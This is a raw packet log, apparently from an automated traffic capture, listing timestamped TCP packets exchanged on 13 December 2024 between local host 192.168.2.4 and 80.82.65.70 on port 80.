                                          Dec 13, 2024 08:36:34.792809963 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.792879105 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.792937994 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.793705940 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.793752909 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.793768883 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.793811083 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.794569969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.794615984 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.794636965 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.794680119 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.795473099 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.795516014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.795521975 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.795561075 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.796390057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.796458960 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.796494007 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.796536922 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.797254086 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.797292948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.797312975 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.797338963 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.798151016 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.798300028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.798358917 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.799042940 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.799098969 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.799148083 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.799201965 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.799937963 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.799993038 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.799999952 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.800038099 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.800829887 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.800880909 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.800925970 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.800970078 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.801745892 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.801769018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.801789045 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.801814079 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.802647114 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.802704096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.802758932 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.803518057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.803601980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.803628922 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.803677082 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.804405928 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.804445982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.804636002 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.805314064 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.805372000 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.805407047 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.805457115 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.806175947 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.806231022 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.806303978 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.806349039 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.807075024 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.807126999 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.807192087 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.807239056 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.808005095 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.808057070 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.808096886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.808141947 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.808895111 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.808979988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.809037924 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.809796095 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.809844971 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.809916019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.809959888 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.810672998 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.810719013 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.810775042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.810817957 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.811543941 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.811589956 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.811929941 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.811981916 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.812462091 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.812509060 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.812634945 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.812679052 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.813342094 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.813435078 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.813483000 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.896969080 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.897022963 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.897079945 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.897115946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.897377014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.897428989 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.897500992 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.897547960 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.898261070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.898299932 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.898575068 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.898621082 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.898686886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.898730040 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.962789059 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.962872028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.962886095 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.962918997 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.962965012 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.963021994 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.963645935 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.963687897 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.963721991 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.963767052 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.964451075 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.964575052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.964636087 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.965363979 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.965471029 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.965512037 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.966240883 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.966285944 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.966336012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.966382980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.967359066 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.967379093 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.967422009 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.968028069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.968070030 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.968112946 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.968153954 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.968924046 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.968970060 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.969007015 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.969876051 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.969927073 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.969990969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.970036983 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.970799923 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.970845938 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.970854998 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.970896006 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.971606970 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.971649885 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.971724987 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.971767902 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.972532034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.972582102 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.972616911 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.972661018 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.973428011 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.973439932 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.973476887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.974318027 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.974329948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.974368095 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.975203037 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.975243092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.975255013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.975297928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.976085901 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.976126909 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.976247072 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.976298094 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.976960897 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.977010012 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.977114916 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.977154970 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.977885962 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.977936029 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.977957010 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.978033066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.978763103 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.978805065 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.978877068 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.978916883 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.979716063 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.979753971 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.979777098 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.979789972 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.980621099 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.980660915 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.980664968 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.980700970 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.981443882 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.981488943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.981529951 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.981565952 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.982361078 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.982528925 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.982574940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.983259916 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.983289957 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.983302116 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.983341932 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.984200001 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.984242916 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.984347105 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.984397888 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.985017061 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.985090017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.985156059 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.985907078 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.985951900 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.985991001 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.986036062 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.986790895 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.987087965 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.987128973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.987690926 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.987737894 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.987801075 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.987845898 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.988585949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.988670111 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.988698006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.988740921 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.989459038 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.989499092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.989641905 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.989690065 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.990367889 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.990489960 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.990544081 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.991350889 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.991400003 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.991405010 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.991451979 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.992156029 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.992198944 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.992255926 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.992300987 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.993087053 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.993271112 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.993313074 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.993936062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.993977070 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.994041920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.994086981 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.994839907 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.994883060 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.995028973 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.995088100 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.995745897 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.995790958 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.995891094 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.995929956 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.996654987 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.996784925 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.996840000 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.997553110 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.997628927 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.997684956 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.998410940 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.998460054 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.998531103 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.998575926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.999320030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.999375105 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.999449968 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.999494076 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.000190020 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.000238895 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.000276089 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.000312090 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.001094103 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.001194954 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.001207113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.001264095 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.002001047 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.002042055 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.002105951 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.002146006 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.002886057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.003031969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.003077030 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.003794909 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.003838062 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.003971100 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.004344940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.004690886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.004736900 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.004771948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.004812002 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.005604982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.005655050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.005698919 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.089365005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.089426994 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.089502096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.089535952 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.089740038 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.089785099 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.089839935 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.089875937 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.090663910 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.090794086 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.090831041 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.091552019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.091594934 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.154382944 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.154491901 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.154536963 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.154789925 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.154839039 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.154905081 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.154943943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.155740976 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.155788898 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.155858040 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.155988932 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.156657934 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.156701088 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.156764030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.156801939 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.157535076 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.157675028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.157716036 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.158401012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.158447027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.158487082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.158524036 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.159267902 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.159308910 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.159497976 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.159662008 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.160212994 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.160255909 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.160325050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.160363913 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.161070108 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.161119938 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.161170006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.161429882 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.161912918 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.161955118 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.162046909 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.162085056 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.162806988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.162844896 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.162945032 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.162986040 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.163733006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.163780928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.163924932 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.163961887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.164664030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.164709091 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.164803028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.164956093 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.165543079 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.165612936 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.165688038 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.165811062 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.166449070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.166480064 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.166547060 CET804977280.82.65.70192.168.2.4
